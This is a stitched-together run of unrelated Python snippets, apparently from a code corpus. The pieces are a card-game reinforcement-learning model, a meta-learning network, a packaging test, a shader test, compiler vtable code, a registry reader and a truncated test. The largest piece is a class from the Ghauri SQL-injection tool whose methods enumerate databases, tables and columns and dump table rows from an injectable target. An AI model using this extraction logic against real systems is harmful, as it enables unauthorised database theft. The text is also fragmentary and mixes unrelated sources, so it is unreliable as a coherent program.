for k in range(len(gathered_output)):
gathered_output[k] = tf.stop_gradient(gathered_output[k])
gathered_outputs.append(gathered_output)
outputs = []
for i in range(7):
scatter_shape = tf.cast(tf.stack([batch_size, gathered_outputs[0][i].shape[1]]), dtype=tf.int64)
outputs.append(tf.add_n([tf.scatter_nd(indices[k], gathered_outputs[k][i], scatter_shape) for k in range(3)]))
return outputs
def get_value(self, role_id, state):
with tf.variable_scope('value_network'):
with tf.variable_scope('value_fc'):
x = state
feats = [1024, 512, 512, 256, 256]
for f in feats:
for _ in range(3):
x = res_fc_block(x, f)
flattened = x
value = slim.fully_connected(flattened, num_outputs=1, activation_fn=None)
value = tf.squeeze(value, 1)
indicator = ((tf.cast(tf.equal(role_id, LORD_ID), tf.float32) * 2) - 1)
return ((- value) * indicator)
def inputs(self):
return [tf.placeholder(tf.int32, [None], 'role_id'), tf.placeholder(tf.float32, [None, POLICY_INPUT_DIM], 'policy_state_in'), tf.placeholder(tf.float32, [None, VALUE_INPUT_DIM], 'value_state_in'), tf.placeholder(tf.float32, [None, POLICY_LAST_INPUT_DIM], 'last_cards_in'), tf.placeholder(tf.int32, [None], 'passive_decision_in'), tf.placeholder(tf.int32, [None], 'passive_bomb_in'), tf.placeholder(tf.int32, [None], 'passive_response_in'), tf.placeholder(tf.int32, [None], 'active_decision_in'), tf.placeholder(tf.int32, [None], 'active_response_in'), tf.placeholder(tf.int32, [None], 'sequence_length_in'), tf.placeholder(tf.int32, [None], 'minor_response_in'), tf.placeholder(tf.int32, [None], 'minor_type_in'), tf.placeholder(tf.int32, [None], 'mode_in'), tf.placeholder(tf.float32, [None], 'history_action_prob_in'), tf.placeholder(tf.float32, [None], 'discounted_return_in')]
def build_graph(self, role_id, prob_state, value_state, last_cards, passive_decision_target, passive_bomb_target, passive_response_target, active_decision_target, active_response_target, seq_length_target, minor_response_target, minor_type, mode, history_action_prob, discounted_return):
(passive_decision_logits, passive_bomb_logits, passive_response_logits, active_decision_logits, active_response_logits, active_seq_logits, minor_response_logits) = self.get_policy(role_id, prob_state, last_cards, minor_type)
passive_decision_prob = tf.nn.softmax(passive_decision_logits, name='passive_decision_prob')
passive_bomb_prob = tf.nn.softmax(passive_bomb_logits, name='passive_bomb_prob')
passive_response_prob = tf.nn.softmax(passive_response_logits, name='passive_response_prob')
active_decision_prob = tf.nn.softmax(active_decision_logits, name='active_decision_prob')
active_response_prob = tf.nn.softmax(active_response_logits, name='active_response_prob')
active_seq_prob = tf.nn.softmax(active_seq_logits, name='active_seq_prob')
minor_response_prob = tf.nn.softmax(minor_response_logits, name='minor_response_prob')
mode_out = tf.identity(mode, name='mode_out')
value = self.get_value(role_id, value_state)
value = tf.identity(value, name='pred_value')
is_training = get_current_tower_context().is_training
if (not is_training):
return
passive_decision_logpa = tf.reduce_sum((tf.one_hot(passive_decision_target, 4) * tf.log(tf.clip_by_value(passive_decision_prob, 1e-07, (1 - 1e-07)))), 1)
passive_response_logpa = tf.reduce_sum((tf.one_hot(passive_response_target, 15) * tf.log(tf.clip_by_value(passive_response_prob, 1e-07, (1 - 1e-07)))), 1)
passive_bomb_logpa = tf.reduce_sum((tf.one_hot(passive_bomb_target, 13) * tf.log(tf.clip_by_value(passive_bomb_prob, 1e-07, (1 - 1e-07)))), 1)
active_decision_logpa = tf.reduce_sum((tf.one_hot(active_decision_target, 13) * tf.log(tf.clip_by_value(active_decision_prob, 1e-07, (1 - 1e-07)))), 1)
active_response_logpa = tf.reduce_sum((tf.one_hot(active_response_target, 15) * tf.log(tf.clip_by_value(active_response_prob, 1e-07, (1 - 1e-07)))), 1)
active_seq_logpa = tf.reduce_sum((tf.one_hot(seq_length_target, 12) * tf.log(tf.clip_by_value(active_seq_prob, 1e-07, (1 - 1e-07)))), 1)
minor_response_logpa = tf.reduce_sum((tf.one_hot(minor_response_target, 15) * tf.log(tf.clip_by_value(minor_response_prob, 1e-07, (1 - 1e-07)))), 1)
logpa = tf.stack([passive_decision_logpa, passive_response_logpa, passive_bomb_logpa, active_decision_logpa, active_response_logpa, active_seq_logpa, minor_response_logpa], axis=1)
idx = tf.stack([tf.range(tf.shape(prob_state)[0]), mode], axis=1)
logpa = tf.gather_nd(logpa, idx)
passive_decision_pa = tf.reduce_sum((tf.one_hot(passive_decision_target, 4) * tf.clip_by_value(passive_decision_prob, 1e-07, (1 - 1e-07))), 1)
passive_response_pa = tf.reduce_sum((tf.one_hot(passive_response_target, 15) * tf.clip_by_value(passive_response_prob, 1e-07, (1 - 1e-07))), 1)
passive_bomb_pa = tf.reduce_sum((tf.one_hot(passive_bomb_target, 13) * tf.clip_by_value(passive_bomb_prob, 1e-07, (1 - 1e-07))), 1)
active_decision_pa = tf.reduce_sum((tf.one_hot(active_decision_target, 13) * tf.clip_by_value(active_decision_prob, 1e-07, (1 - 1e-07))), 1)
active_response_pa = tf.reduce_sum((tf.one_hot(active_response_target, 15) * tf.clip_by_value(active_response_prob, 1e-07, (1 - 1e-07))), 1)
active_seq_pa = tf.reduce_sum((tf.one_hot(seq_length_target, 12) * tf.clip_by_value(active_seq_prob, 1e-07, (1 - 1e-07))), 1)
minor_response_pa = tf.reduce_sum((tf.one_hot(minor_response_target, 15) * tf.clip_by_value(minor_response_prob, 1e-07, (1 - 1e-07))), 1)
pa = tf.stack([passive_decision_pa, passive_response_pa, passive_bomb_pa, active_decision_pa, active_response_pa, active_seq_pa, minor_response_pa], axis=1)
idx = tf.stack([tf.range(tf.shape(prob_state)[0]), mode], axis=1)
pa = tf.gather_nd(pa, idx)
importance_b = tf.stop_gradient(tf.clip_by_value((pa / (history_action_prob + 1e-08)), 0, 10))
advantage_b = tf.subtract(discounted_return, tf.stop_gradient(value), name='advantage')
policy_loss_b = (((- logpa) * advantage_b) * importance_b)
entropy_loss_b = (pa * logpa)
value_loss_b = tf.square((value - discounted_return))
entropy_beta = tf.get_variable('entropy_beta', shape=[], initializer=tf.constant_initializer(0.001), trainable=False)
ctx = get_current_tower_context()
if ctx.has_own_variables:
l2_loss = ctx.get_collection_in_tower(tf.GraphKeys.REGULARIZATION_LOSSES)
else:
l2_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
if (len(l2_loss) > 0):
logger.info('regularize_cost_from_collection() found {} regularizers in REGULARIZATION_LOSSES collection.'.format(len(l2_loss)))
l2_losses = []
for role in range(1, 4):
scope = ('policy_network_%d' % role)
l2_loss_role = [l for l in l2_loss if l.op.name.startswith(scope)]
l2_main_loss = [l for l in l2_loss_role if ('branch_main' in l.name)]
l2_passive_fc_loss = [l for l in l2_loss_role if (('branch_passive' in l.name) and ('decision' not in l.name) and ('bomb' not in l.name) and ('response' not in l.name))]
l2_active_fc_loss = [l for l in l2_loss_role if (('branch_active' in l.name) and ('decision' not in l.name) and ('response' not in l.name) and ('seq_length' not in l.name))]
l2_active_lstm_weight = [l for l in ctx.get_collection_in_tower(tf.GraphKeys.TRAINABLE_VARIABLES) if (l.op.name == (scope + '/branch_active/decision/rnn/basic_lstm_cell/kernel'))]
l2_active_lstm_loss = [(POLICY_WEIGHT_DECAY * tf.nn.l2_loss(l2_active_lstm_weight[0]))]
assert (len(l2_active_lstm_loss) > 0)
print('l2 loss', len(l2_loss_role))
print('l2 main loss', len(l2_main_loss))
print('l2 passive fc loss', len(l2_passive_fc_loss))
print('l2 active fc loss', len(l2_active_fc_loss))
name_scopes = ['branch_passive/decision', 'branch_passive/bomb', 'branch_passive/response', 'branch_active/decision', 'branch_active/response', 'branch_active/seq_length', 'branch_minor']
losses = []
for (i, name) in enumerate(name_scopes):
l2_branch_loss = l2_main_loss.copy()
if ('passive' in name):
if ('bomb' in name):
l2_branch_loss += [l for l in l2_loss_role if (name in l.name)]
else:
l2_branch_loss += (l2_passive_fc_loss + [l for l in l2_loss_role if (name in l.name)])
elif ('minor' in name):
l2_branch_loss += (l2_active_fc_loss + [l for l in l2_loss_role if (name in l.name)])
else:
l2_branch_loss += ((l2_active_fc_loss + [l for l in l2_loss_role if (name in l.name)]) + l2_active_lstm_loss)
losses.append(tf.add_n(l2_branch_loss))
print(name, 'l2 branch loss', len(l2_branch_loss))
losses = tf.stack(losses, axis=0)
if ((role == 1) or (role == 3)):
losses = tf.stop_gradient(losses)
l2_losses.append(losses)
l2_losses = tf.stack(l2_losses, axis=0)
l2_losses = tf.gather(l2_losses, role_id)
l2_losses = tf.gather_nd(l2_losses, idx)
print(l2_losses.shape)
costs = []
for i in range(1, 4):
mask = tf.equal(role_id, i)
l2_loss = tf.reduce_mean(tf.boolean_mask(l2_losses, mask), name=('l2_loss_%d' % i))
pred_reward = tf.reduce_mean(tf.boolean_mask(value, mask), name=('predict_reward_%d' % i))
true_reward = tf.reduce_mean(tf.boolean_mask(discounted_return, mask), name=('true_reward_%d' % i))
advantage = tf.sqrt(tf.reduce_mean(tf.square(tf.boolean_mask(advantage_b, mask))), name=('rms_advantage_%d' % i))
policy_loss = tf.reduce_sum(tf.boolean_mask(policy_loss_b, mask, name=('policy_loss_%d' % i)))
entropy_loss = tf.reduce_sum(tf.boolean_mask(entropy_loss_b, mask, name=('entropy_loss_%d' % i)))
value_loss = tf.reduce_sum(tf.boolean_mask(value_loss_b, mask, name=('value_loss_%d' % i)))
cost = tf.add_n([policy_loss, (entropy_loss * entropy_beta), value_loss, l2_loss])
cost = tf.truediv(cost, tf.reduce_sum(tf.cast(mask, tf.float32)), name=('cost_%d' % i))
costs.append(cost)
importance = tf.reduce_mean(tf.boolean_mask(importance_b, mask), name=('importance_%d' % i))
add_moving_summary(policy_loss, entropy_loss, value_loss, pred_reward, true_reward, advantage, cost, importance, decay=0)
return tf.add_n(costs)
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.0001, trainable=False)
opt = tf.train.AdamOptimizer(lr)
gradprocs = [MapGradient((lambda grad: tf.clip_by_average_norm(grad, 0.3)))]
opt = optimizer.apply_grad_processors(opt, gradprocs)
return opt |
class VNet(MetaModule):
def __init__(self, input, hidden, output):
super(VNet, self).__init__()
self.linear1 = MetaLinear(input, hidden)
self.relu = nn.ReLU(inplace=True)
self.linear2 = MetaLinear(hidden, output)
def forward(self, x):
x = self.linear1(x)
x = self.relu(x)
out = self.linear2(x)
return F.sigmoid(out) |
class GhauriAdvance():
def __execute_expression(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, suppress_output=False, query_check=False, list_of_chars=None, not_match_string=None, code=None, text_only=False, dump_type=None):
retval = ghauri_extractor.fetch_characters(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack, match_string=match_string, suppress_output=suppress_output, query_check=query_check, list_of_chars=list_of_chars, dump_type=dump_type)
return retval
def fetch_dbs(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, batch=False, not_match_string=None, code=None, text_only=False):
if ((start != 0) and (start > 0)):
if (backend != 'Oracle'):
start = (start - 1)
logger.info('fetching database names')
Response = collections.namedtuple('Response', ['ok', 'error', 'result'])
_results = set()
_temp = Response(ok=False, error='', result=[])
logger.info('fetching number of databases')
payloads_count = PAYLOADS_DBS_COUNT.get(backend)
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
if (not retval.ok):
if (backend == 'Microsoft SQL Server'):
logger.debug('ghauri could not determine number of databases, using DB_NAME to fetch dbs ..')
payloads_names = PAYLOADS_DBS_NAMES.get(backend)
payload = None
total = 0
guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
if guess.ok:
payload = guess.payload
logger.debug(f"Working payload found for database extraction: '{payload}'")
if (not payload):
logger.critical('Ghauri was not able identify payload for database(s) fetching, try manually.')
return _temp
payload = clean_up_offset_payload(payload, backend=backend)
null_counter_limit = 0
stop = 20
while (start < stop):
if (null_counter_limit == 3):
logger.debug('limit reached..')
break
_payload = payload.format(offset=start)
payloads = [_payload]
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only)
if retval.ok:
if (retval.result not in _results):
logger.debug(('retrieved: %s' % retval.result))
_results.add(retval.result)
else:
null_counter_limit += 1
start += 1
if _results:
_results = list(set(list(_results)))
total = len(_results)
logger.info(('retrieved: %s' % total))
for db in _results:
logger.info(('retrieved: %s' % db))
_temp = Response(ok=True, error='', result=_results)
logger.success(f'available databases [{total}]:')
for db in _results:
logger.success(f'[*] {db}')
else:
logger.warning('the SQL query provided does not return any output')
logger.error('unable to retrieve the number of databases')
return _temp
if retval.ok:
total = 0
if retval.result.isdigit():
total = int(retval.result)
logger.info(('retrieved: %s' % total))
if (total == 0):
logger.warning('the SQL query provided does not return any output')
logger.error('unable to retrieve the number of databases')
if (total > 0):
if (not stop):
stop = total
elif (stop and (stop > 0)):
if (stop > total):
logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
stop = total
else:
stop = total
payloads_names = PAYLOADS_DBS_NAMES.get(backend)
payload = None
guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
if guess.ok:
payload = guess.payload
logger.debug(f"Working payload found for database extraction: '{payload}'")
if (not payload):
logger.critical('Ghauri was not able identify payload for database(s) fetching, try manually.')
return _temp
payload = clean_up_offset_payload(payload, backend=backend)
if (payload and (backend == 'Microsoft SQL Server') and ('DB_NAME' in payload)):
stop = (stop + 1)
if ((start == 0) and (backend == 'Oracle')):
start = (1 if (start == 0) else start)
stop = ((total + 1) if (stop == total) else (stop + 1))
while (start < stop):
payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
try:
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_dbs')
if retval.ok:
if (retval.result not in _results):
if retval.resumed:
logger.info(('resumed: %s' % retval.result))
else:
logger.info(('retrieved: %s' % retval.result))
_results.add(retval.result)
if ((not retval.ok) and (retval.error == 'user_ended')):
break
except KeyboardInterrupt:
quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
if (quest == 'n'):
break
start += 1
if _results:
_temp = Response(ok=True, error='', result=_results)
logger.success(f'available databases [{total}]:')
for db in _results:
logger.success(f'[*] {db}')
return _temp
def fetch_tables(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, batch=False, not_match_string=None, code=None, text_only=False):
if ((start != 0) and (start > 0)):
if (backend != 'Oracle'):
start = (start - 1)
logger.info(f'fetching tables for database: {database}')
Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'result'])
_results = set()
_temp = Response(ok=False, error='', database=database, result=[])
logger.info(f"fetching number of tables for database '{mc}{database}{nc}'")
payloads_count = PAYLOADS_TBLS_COUNT.get(backend)
payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, is_string=conf.is_string)
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
if retval.ok:
total = 0
if retval.result.isdigit():
total = int(retval.result)
logger.info(('retrieved: %s' % total))
if (total == 0):
logger.warning(f"database '{database}' appears to be empty")
logger.warning('the SQL query provided does not return any output')
if (total > 0):
if (not stop):
stop = total
elif (stop and (stop > 0)):
if (stop > total):
logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
stop = total
else:
stop = total
payloads_names = PAYLOADS_TBLS_NAMES.get(backend)
payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, is_string=conf.is_string)
payload = None
guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
if guess.ok:
payload = guess.payload
logger.debug(f"Working payload found for table(s) extraction: '{payload}'")
if (not payload):
logger.critical('Ghauri was not able identify payload for table(s) fetching, try manually.')
return _temp
payload = clean_up_offset_payload(payload, backend=backend)
if ((start == 0) and (backend == 'Oracle')):
start = (1 if (start == 0) else start)
stop = ((total + 1) if (stop == total) else (stop + 1))
while (start < stop):
payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
try:
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_tables')
if retval.ok:
if retval.resumed:
logger.info(('resumed: %s' % retval.result))
else:
logger.info(('retrieved: %s' % retval.result))
if (retval.result not in _results):
_results.add(retval.result)
if ((not retval.ok) and (retval.error == 'user_ended')):
break
except KeyboardInterrupt:
quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
if (quest == 'n'):
break
start += 1
if _results:
_temp = Response(ok=True, error='', database=database, result=_results)
ret = prettifier(cursor_or_list=_results, field_names='Tables')
logger.success(f'Database: {database}')
logger.success(f'[{ret.entries} tables]')
logger.success(f'{ret.data}')
return _temp
def fetch_columns(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, table=None, batch=False, not_match_string=None, code=None, text_only=False):
if ((start != 0) and (start > 0)):
if (backend != 'Oracle'):
start = (start - 1)
logger.info(f"fetching columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'table', 'result'])
_results = []
_temp = Response(ok=False, error='', database=database, table=table, result=[])
logger.info(f"fetching number of columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
payloads_count = PAYLOADS_COLS_COUNT.get(backend)
if (backend == 'Microsoft SQL Server'):
table = table.replace('dbo.', '').replace('sys.', '')
payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, table=table)
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
if retval.ok:
total = 0
if retval.result.isdigit():
total = int(retval.result)
logger.info(('retrieved: %s' % total))
if (total == 0):
logger.warning('the SQL query provided does not return any output')
if (total > 0):
if (not stop):
stop = total
elif (stop and (stop > 0)):
if (stop > total):
logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
stop = total
else:
stop = total
payloads_names = PAYLOADS_COLS_NAMES.get(backend)
payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, table=table, is_string=conf.is_string)
payload = None
guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
if guess.ok:
payload = guess.payload
logger.debug(f"Working payload found for column(s) extraction: '{payload}'")
if (not payload):
logger.critical('Ghauri was not able identify payload for column(s) fetching, try manually.')
return _temp
payload = clean_up_offset_payload(payload, backend=backend)
if ((start == 0) and (backend == 'Oracle')):
start = (1 if (start == 0) else start)
stop = ((total + 1) if (stop == total) else (stop + 1))
while (start < stop):
payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload)
try:
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_{table}_columns')
if retval.ok:
if retval.resumed:
logger.info(('resumed: %s' % retval.result))
else:
logger.info(('retrieved: %s' % retval.result))
_results.append(retval.result)
if ((not retval.ok) and (retval.error == 'user_ended')):
break
except KeyboardInterrupt:
quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
if (quest == 'n'):
break
start += 1
if _results:
_temp = Response(ok=True, error='', database=database, table=table, result=_results)
ret = prettifier(_results, field_names='Columns')
logger.success(f'Database: {database}')
logger.success(f'Table: {table}')
logger.success(f'[{ret.entries} columns]')
logger.success(f'{ret.data}')
return _temp
def dump_table(self, url, data, vector, parameter, headers, base, injection_type, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack=None, match_string=None, start=0, stop=None, database=None, table=None, columns=None, batch=False, not_match_string=None, code=None, text_only=False):
__columns = to_list(columns)
if ((start != 0) and (start > 0)):
if (backend != 'Oracle'):
start = (start - 1)
logger.info(f"fetching entries of column(s) '{mc}{columns}{bw}' for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
Response = collections.namedtuple('Response', ['ok', 'error', 'database', 'table', 'result'])
_results = []
_temp = Response(ok=False, error='', database=database, table=table, result=[])
logger.info(f"{bw}fetching number of column(s) '{mc}{columns}{bw}' entries for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'")
payloads_count = PAYLOADS_RECS_COUNT.get(backend)
_column = (__columns[(- 1)] if (backend == 'Microsoft SQL Server') else None)
payloads_count = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_count, table=table, column=_column, dump=True)
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_count, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, list_of_chars='', not_match_string=not_match_string, code=code, text_only=text_only)
if retval.ok:
total = 0
if retval.result.isdigit():
total = int(retval.result)
logger.info(('retrieved: %s' % total))
if (total == 0):
logger.warning('the SQL query provided does not return any output')
if (total > 0):
if (not stop):
stop = total
elif (stop and (stop > 0)):
if (stop > total):
logger.warning(f'--stop={stop} is greater then total count setting it to --stop={total}')
stop = total
else:
stop = total
payloads_names = PAYLOADS_RECS_DUMP.get(backend)
payloads_names = prepare_extraction_payloads(database=database, backend=backend, payloads=payloads_names, table=table, column=__columns[(- 1)], dump=True)
payload = None
guess = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads_names, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=True, not_match_string=not_match_string, code=code, text_only=text_only)
if guess.ok:
payload = guess.payload
logger.debug(f"Working payload found for table dump: '{payload}'")
if (not payload):
logger.critical('Ghauri was not able identify payload for table dump, try manually.')
return _temp
payload = clean_up_offset_payload(payload, backend=backend, column=__columns[(- 1)])
if (backend == 'Microsoft SQL Server'):
if ('LIMIT=' in payload):
stop = ((total + 1) if (stop == total) else (stop + 1))
start = (1 if (start == 0) else start)
if payload.endswith('WHERE 1=1)'):
logger.warning('it was not possible to dump all of the entries for the SQL query provided. Ghauri will assume that it returns only one entry')
start = 1
stop = 2
if ((start == 0) and (backend == 'Oracle')):
start = (1 if (start == 0) else start)
stop = ((total + 1) if (stop == total) else (stop + 1))
while (start < stop):
__temp = []
is_user_ended = False
is_interrupted = False
for column_name in __columns:
payloads = prepare_query_payload(backend=backend, offset=start, payload_string=payload, column_name=column_name)
try:
retval = self.__execute_expression(url, data, vector, parameter, headers, base, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack=attack, match_string=match_string, suppress_output=True, query_check=False, not_match_string=not_match_string, code=code, text_only=text_only, dump_type=f'{start}_{database}_{table}_{column_name}_dump')
if retval.ok:
if (retval.result not in __temp):
if retval.resumed:
logger.info(('resumed: %s' % retval.result))
else:
logger.info(('retrieved: %s' % retval.result))
__temp.append(retval.result)
if ((not retval.ok) and (retval.error == 'user_ended')):
is_user_ended = True
break
except KeyboardInterrupt:
quest = logger.read_input('user interrupted during data fetching, Do you want to continue? [y/N] ', batch=batch, user_input='N')
if (quest == 'n'):
is_interrupted = True
break
if is_user_ended:
break
if __temp:
if (len(__temp) == len(__columns)):
_results.append(__temp)
if is_interrupted:
break
start += 1
if _results:
_temp = Response(ok=True, error='', database=database, table=table, result=_results)
ret = prettifier(_results, field_names=columns, header=True)
logger.success(f'Database: {database}')
logger.success(f'Table: {table}')
logger.success(f'[{ret.entries} entries]')
logger.success(f'{ret.data}')
try:
session.dump_to_csv(_results, field_names=__columns, filepath=conf.session_filepath, database=database, table=table)
except Exception as error:
logger.debug(error)
return _temp |
.requires_internet
def test_sync_project_dependencies(hatch, helpers, temp_dir, config_file):
config_file.model.template.plugins['default']['tests'] = False
config_file.save()
project_name = 'My.App'
with temp_dir.as_cwd():
result = hatch('new', project_name)
assert (result.exit_code == 0), result.output
project_path = (temp_dir / 'my-app')
data_path = (temp_dir / 'data')
data_path.mkdir()
with project_path.as_cwd(env_vars={ConfigEnvVars.DATA: str(data_path)}):
result = hatch('env', 'create', 'default')
assert (result.exit_code == 0), result.output
assert (result.output == helpers.dedent('\n Creating environment: default\n Installing project in development mode\n Checking dependencies\n '))
env_data_path = ((data_path / 'env') / 'virtual')
assert env_data_path.is_dir()
project_data_path = (env_data_path / project_path.name)
assert project_data_path.is_dir()
storage_dirs = list(project_data_path.iterdir())
assert (len(storage_dirs) == 1)
storage_path = storage_dirs[0]
assert (len(storage_path.name) == 8)
env_dirs = list(storage_path.iterdir())
assert (len(env_dirs) == 1)
env_path = env_dirs[0]
assert (env_path.name == project_path.name)
project = Project(project_path)
config = dict(project.raw_config)
config['project']['dependencies'] = ['binary']
project.save_config(config)
with project_path.as_cwd(env_vars={ConfigEnvVars.DATA: str(data_path)}):
result = hatch('run', 'python', '-c', "import binary,pathlib,sys;pathlib.Path('test.txt').write_text(str(binary.convert_units(1024)))")
assert (result.exit_code == 0), result.output
assert (result.output == helpers.dedent('\n Checking dependencies\n Syncing dependencies\n '))
output_file = (project_path / 'test.txt')
assert output_file.is_file()
assert (str(output_file.read_text()) == "(1.0, 'KiB')") |
def test_varyings_struct_position1():
code1 = '\n fn vs_main() -> Varyings {\n }\n fn fs_main(varyings : Varyings) {\n }\n '
code2 = '\n struct Varyings {\n };\n\n fn vs_main() -> Varyings {\n }\n fn fs_main(varyings : Varyings) {\n }\n '
code3 = resolve_varyings(code1)
assert (code3.strip() == code2.strip()) |
def generate_vtables(base: ClassIR, vtable_setup_name: str, vtable_name: str, emitter: Emitter, shadow: bool) -> str:
def trait_vtable_name(trait: ClassIR) -> str:
return '{}_{}_trait_vtable{}'.format(base.name_prefix(emitter.names), trait.name_prefix(emitter.names), ('_shadow' if shadow else ''))
def trait_offset_table_name(trait: ClassIR) -> str:
return '{}_{}_offset_table'.format(base.name_prefix(emitter.names), trait.name_prefix(emitter.names))
emitter.emit_line('static CPyVTableItem {}[{}];'.format(vtable_name, max(1, (len(base.vtable_entries) + (3 * len(base.trait_vtables))))))
for (trait, vtable) in base.trait_vtables.items():
emitter.emit_line(f'static CPyVTableItem {trait_vtable_name(trait)}[{max(1, len(vtable))}];')
emitter.emit_line('static size_t {}[{}];'.format(trait_offset_table_name(trait), max(1, len(trait.attributes))))
emitter.emit_line('static bool')
emitter.emit_line(f'{NATIVE_PREFIX}{vtable_setup_name}(void)')
emitter.emit_line('{')
if (base.allow_interpreted_subclasses and (not shadow)):
emitter.emit_line(f'{NATIVE_PREFIX}{vtable_setup_name}_shadow();')
subtables = []
for (trait, vtable) in base.trait_vtables.items():
name = trait_vtable_name(trait)
offset_name = trait_offset_table_name(trait)
generate_vtable(vtable, name, emitter, [], shadow)
generate_offset_table(offset_name, emitter, trait, base)
subtables.append((trait, name, offset_name))
generate_vtable(base.vtable_entries, vtable_name, emitter, subtables, shadow)
emitter.emit_line('return 1;')
emitter.emit_line('}')
return (vtable_name if (not subtables) else f'{vtable_name} + {(len(subtables) * 3)}') |
def read_values(base, key):
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
(name, value, type) = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[convert_mbcs(name)] = convert_mbcs(value)
i += 1
return d |
def test_format_skeleton(timezone_getter):
dt = datetime(2007, 4, 1, 15, 30)
